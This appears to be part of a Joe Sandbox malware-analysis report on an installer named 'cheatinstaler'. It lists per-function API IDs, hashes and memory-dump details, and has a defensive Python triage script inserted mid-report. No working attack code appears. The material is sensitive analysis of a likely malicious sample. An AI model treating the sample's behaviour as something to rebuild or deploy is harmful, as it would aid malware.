                                                                                  • API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
                                                                                  • String ID: sfxcmd$sfxpar
                                                                                  • API String ID: 3540648995-3493335439
                                                                                  • Opcode ID: f7f09a535254ba7702706040489ea7439e58d63b661cc729fc85acc9afefde13
                                                                                  • Instruction ID: 60769751683c5866348258cb04f979a24cc320dae7fcf2393d110e9da13d7298
                                                                                  • Opcode Fuzzy Hash: f7f09a535254ba7702706040489ea7439e58d63b661cc729fc85acc9afefde13
                                                                                  • Instruction Fuzzy Hash: 52317032E14A4694FB04AF66E4E41ACB371FB44BD8F980131EE5D177A9DE38E041C364
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                  • API String ID: 0-56093855
                                                                                  • Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                  • Instruction ID: c3a946251058990285bb608352954f70dd7e6a639354fb5ebb6a0ae318f58eff
                                                                                  • Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
                                                                                  • Instruction Fuzzy Hash: F921EB22E09B87A1FA11EF27B8E4174E3A1BB49B85F9C0036E94D47765DE3CE584C360
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                  • API String ID: 4061214504-1276376045
                                                                                  • Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                  • Instruction ID: cfccd5f97246ecf71c96679111f367d0f4260cfb23b7d98c82f5470a680b11ac
                                                                                  • Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
                                                                                  • Instruction Fuzzy Hash: DBF04F21A19A4281FE55AF12F4E427DA3A0FF88BD4F9C1035D94F46665DE3CE588C720
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: _invalid_parameter_noinfo
                                                                                  • String ID:
                                                                                  • API String ID: 3215553584-0
                                                                                  • Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                  • Instruction ID: c83c7e85409849f65edd47d060aca5e9aa08020c8f77f64452d2017cd920c25d
                                                                                  • Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
                                                                                  • Instruction Fuzzy Hash: 9881F522F1864285F711BF2788E06BDB6A0BB46B94FA84135CD0E53695EF3CA446D730
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
                                                                                  • Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
                                                                                  • String ID:
                                                                                  • API String ID: 2398171386-0
                                                                                  • Opcode ID: 8c9e27b33bb60ec2ca70bdd01c92279f10c16d884dcde86fae8fb32e95875df8
                                                                                  • Instruction ID: 2f115ffcda4387fa67532cbdc4975b9dab44a620147713fa92ef39d9efe91934
                                                                                  • Opcode Fuzzy Hash: 8c9e27b33bb60ec2ca70bdd01c92279f10c16d884dcde86fae8fb32e95875df8
                                                                                  • Instruction Fuzzy Hash: F151D422B04A4259FB20EF76F4A02FDA3B1AF447A8F884635EE1D477D4EE3891158310
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
• String ID:
• API String ID: 3659116390-0
• Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
• Instruction ID: e497c6227d9087c38bc62e7b2c7869129c012e9ec4e56db58f454a29a1d64eee
• Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
• Instruction Fuzzy Hash: 9251F132A14A6189F711DF26E8903ACBBB0FB45798F588135CE4E57B99EF38D145C720
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: ByteCharMultiWide$AllocString
• String ID:
• API String ID: 262959230-0
• Opcode ID: 78f40180803c07e16f725ce8caa782a98fbfbfcb68ebd86bc368cce44f009025
• Instruction ID: 4af3325c2704ae864af2807b00419fa483a904ecf6c41add63508bb6f2454a4d
• Opcode Fuzzy Hash: 78f40180803c07e16f725ce8caa782a98fbfbfcb68ebd86bc368cce44f009025
• Instruction Fuzzy Hash: FA41B431A0964689FB14AF2394A0379A295FF44BE4F9C4634EA6E477D5DF3CD2418320
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
• Instruction ID: d25f5511539ac1438cb15f8e966f81a90b99232eeb2af277581ab711d22bf833
• Opcode Fuzzy Hash: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
• Instruction Fuzzy Hash: EF410563B19A4282FA15EF13A8A4575B396BF04BD0F9D4535EE1D4B748EE3CE1018324
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
• Instruction ID: 03f32480b8af8c606c2ed8172e5ecc6722b4dfa4cb40975c503401ccbfb3f27d
• Opcode Fuzzy Hash: f3bd3298a46f29c998dca386ec4adc9bd6d7efdfabb851da102e47160911a3a1
• Instruction Fuzzy Hash: CE11C436E1C60F81F6543B26E5F1379A5826F443E0FFCC270EA7E865D6CE2CA8444129
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: Message$DispatchObjectPeekSingleTranslateWait
• String ID:
• API String ID: 3621893840-0
• Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
• Instruction ID: 94027cbbfba0a7c3ca6f8930f69cb25d5ea48fb13870a84d661d28dd6484aa2e
• Opcode Fuzzy Hash: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
• Instruction Fuzzy Hash: E8F0FF22F2855692F750AF22E4F9A7AB251FFE4B45FD81030E54E419949E2CD549C720
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: __except_validate_context_recordabort
• String ID: csm$csm
• API String ID: 746414643-3733052814
• Opcode ID: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
• Instruction ID: 5c621e54f33d27ca59e702019073c21751d6252a9216086ddad1e3a55d66640e
• Opcode Fuzzy Hash: 91fc108a1c492767e4bb41002f60c2920875b1ec76e01922ab372504797a4c8e
• Instruction Fuzzy Hash: 2571B17250869286DB60AF2690E077DFBA1FB01BE9F988135DA4C07A85CF3CD699C750
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: $*
• API String ID: 3215553584-3982473090
• Opcode ID: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
• Instruction ID: 5233b932231616b60323850a7c9ac65f3afc3fb673f83960d83f9484cd6b080d
• Opcode Fuzzy Hash: 42643a1ee39b50d27a50b926b179a62c0cdc4d381fe14b17104e750277292b9f
• Instruction Fuzzy Hash: 0851587291CA428AE764AF3A84E437C77A0FB05B99F9C1135CB4A41299CF3CF681C725
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: ByteCharMultiWide$StringType
• String ID: $%s
• API String ID: 3586891840-3791308623
• Opcode ID: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
• Instruction ID: effe2b716d6e67ac4f5c15bb9210d798b4e929de05fb2150b17976a96c4ea33a
• Opcode Fuzzy Hash: 8174e861c2faa6f2f7f5292a0ee7474812abc1109b8acb2517e9a7bc716d8d39
• Instruction Fuzzy Hash: 8641A122B14B858AFB60AF27D8912A9A391FB44BE8F9C0235EE1D477C5DF3CE5458710
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: CreateFrameInfo__except_validate_context_recordabort
• String ID: csm
• API String ID: 2466640111-1018135373
• Opcode ID: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
• Instruction ID: 3267df11559df9e80f9f8fda9f31acaba3c835280e1013683324c0d3ac2057d1
• Opcode Fuzzy Hash: ef48871438151390fa300b301edbe87f2aaf35895cd4fd9de5e2d21b12dcaab2
• Instruction Fuzzy Hash: 8A514C7662874587DA20BF26E09026EB7A4FB89BE0F980134EB8D07B55CF3CE551CB50
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: ByteCharErrorFileLastMultiWideWrite
• String ID: U
• API String ID: 2456169464-4171548499
• Opcode ID: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
• Instruction ID: c2b9793051850f049377ff5c6b5250e84044a7b4e5327c5363d7fb93e3bd5f7e
• Opcode Fuzzy Hash: a3c4996b5397ae7c68c43f4944c85cd830f0b958292ccb38960a62bfe152ddee
• Instruction Fuzzy Hash: D041E832718A8182E721DF26E8943B9B7A0FB98794F984131EE4D87754EF7CD445C710
APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: ObjectRelease
• String ID:
• API String ID: 1429681911-3916222277
• Opcode ID: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
• Instruction ID: 65a39e4d3ede8ac1c903785acdb9e3a223ad6e1abce6e74d158f23b4b352f86b
• Opcode Fuzzy Hash: 0b5772d91688d342ea342be5c9c3c9ea07a5ad9e93d570546deb1a9808731c40
• Instruction Fuzzy Hash: D2315C3664874286EB04EF13B86872AB7A0FB89FD2F844435ED4A53B54CE3CE449CB10
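The per-function entries above all follow one layout: an "APIs" table (call sites of the form `Name.MODULE(args), ref: VA`), a "Memory Dump Source" block whose Offset is the image base of the dumped PE, and a "Similarity" block whose "API ID" is built from the words of the API names the function calls (AddressProc for GetProcAddress, Message$DispatchObjectPeekSingleTranslateWait for a message pump). The script below is an added example, not part of the Joe Sandbox report or its tooling: it parses entries in that layout from a constructed, abridged sample embedded in the script, converts each call-site VA to an RVA against the dump's image base, and flags entries whose API-ID words match a small watchlist. The watchlist and its mapping of API-ID words back to Win32 function names are assumptions made for the example.

```python
"""Triage Joe Sandbox per-function entries (added example, not report tooling)."""
import re
from dataclasses import dataclass, field

# Keyword sets matched against the CamelCase words of an entry's "API ID".
# Mapping these words back to Win32 names is an assumption of this example.
WATCHLIST = {
    "dynamic API resolution (GetProcAddress)": {"Address", "Proc"},
    "message pump / object wait": {"Peek", "Dispatch", "Translate", "Wait"},
    "code page conversion (MultiByteToWideChar)": {"Byte", "Char", "Multi", "Wide"},
}

CALL_RE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
WORD_RE = re.compile(r"[A-Z][a-z0-9]*")
SECTIONS = ("Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity")

# Constructed sample in the report's layout (abridged; values copied from entries above).
SAMPLE = """APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
Similarity
• API ID: AddressProc
• String ID:
• API String ID: 190572456-0
• Opcode ID: d8da239e760e4119be076ce5ae60c5d71a4e7276355522d8061e2664917ecd9d
APIs
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
Similarity
• API ID: Message$DispatchObjectPeekSingleTranslateWait
• String ID:
• API String ID: 3621893840-0
• Opcode ID: eb57a341668d454e4e6cd52f39bb1811463ddcab187ea95c48cb89abc8d18535
APIs
• InitializeCriticalSection.KERNEL32(?,?,?,00007FF75456317F,?,?,00001000,00007FF75454E51D), ref: 00007FF75455E8BB
• CreateSemaphoreW.KERNEL32(?,?,?,00007FF75456317F,?,?,00001000,00007FF75454E51D), ref: 00007FF75455E8CB
• CreateEventW.KERNEL32(?,?,?,00007FF75456317F,?,?,00001000,00007FF75454E51D), ref: 00007FF75455E8E4
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
"""


@dataclass
class Entry:
    calls: list = field(default_factory=list)    # (api_name, module, call_site_va)
    fields: dict = field(default_factory=dict)   # "API ID", "Opcode ID", "Source File", ...

    def image_base(self):
        m = re.search(r"Offset:\s*([0-9A-Fa-f]+)", self.fields.get("Source File", ""))
        return int(m.group(1), 16) if m else None

    def call_rvas(self):
        base = self.image_base()
        return [] if base is None else [va - base for _, _, va in self.calls]

    def api_words(self):
        # "$" separates word groups in the API ID; treat both groups as one word set.
        return set(WORD_RE.findall(self.fields.get("API ID", "").replace("$", " ")))

    def hits(self):
        words = self.api_words()
        return [label for label, needed in WATCHLIST.items() if needed <= words]


def parse_entries(text):
    """Split report text into Entry objects; each entry starts at a bare 'APIs' line."""
    entries, cur, section = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "APIs":
            cur, section = Entry(), "APIs"
            entries.append(cur)
            continue
        if cur is None:
            continue
        if line in SECTIONS:
            section = line
            continue
        if section == "APIs":
            m = CALL_RE.match(line)
            if m:
                cur.calls.append((m["name"], m["module"], int(m["ref"], 16)))
            continue
        m = FIELD_RE.match(line)
        if m:
            cur.fields[m["key"]] = m["val"].strip()   # later duplicates (e.g. Associated) overwrite
    return entries


def triage(text):
    """One summary per entry: truncated opcode id, watchlist hits, call sites as RVAs."""
    return [
        {
            "opcode_id": e.fields.get("Opcode ID", "")[:16],
            "hits": e.hits(),
            "calls": [f"{n}.{mod}@rva:{rva:#x}" for (n, mod, _), rva in zip(e.calls, e.call_rvas())],
        }
        for e in parse_entries(text)
    ]


if __name__ == "__main__":
    for row in triage(SAMPLE):
        print(row)
```

Feeding the full report text to `triage()` gives one row per function; the RVAs let you jump straight to the call sites in the dumped image (offset 00007FF754540000) in a disassembler, and the watchlist hits narrow a few thousand entries down to the handful worth reading, such as the GetProcAddress-style resolver and the message-pump loop.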
APIs
• InitializeCriticalSection.KERNEL32(?,?,?,00007FF75456317F,?,?,00001000,00007FF75454E51D), ref: 00007FF75455E8BB
• CreateSemaphoreW.KERNEL32(?,?,?,00007FF75456317F,?,?,00001000,00007FF75454E51D), ref: 00007FF75455E8CB
• CreateEventW.KERNEL32(?,?,?,00007FF75456317F,?,?,00001000,00007FF75454E51D), ref: 00007FF75455E8E4
Strings
Memory Dump Source
• Source File: 00000003.00000002.1367770964.00007FF754541000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF754540000, based on PE: true
• Associated: 00000003.00000002.1367745447.00007FF754540000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1367933539.00007FF754588000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF75459B000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368094567.00007FF7545A4000.00000004.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AA000.00000002.00000001.01000000.00000007.sdmp
• Associated: 00000003.00000002.1368299014.00007FF7545AE000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_7ff754540000_cheatinstaler cheatinstalerF6R54T.jbxd
                                                                                  Similarity
                                                                                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                  • String ID: Thread pool initialization failed.
                                                                                  • API String ID: 3340455307-2182114853
                                                                                  • Opcode ID: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
                                                                                  • Instruction ID: 317b5ccc684b43da17cf953d3849f6bc65a2304d5d8233e3ff769bec49e56be2
                                                                                  • Opcode Fuzzy Hash: 6610cce2f1ff4f40d78c24fcbab0d777ace7136147ab701da82aad1b7a389e44
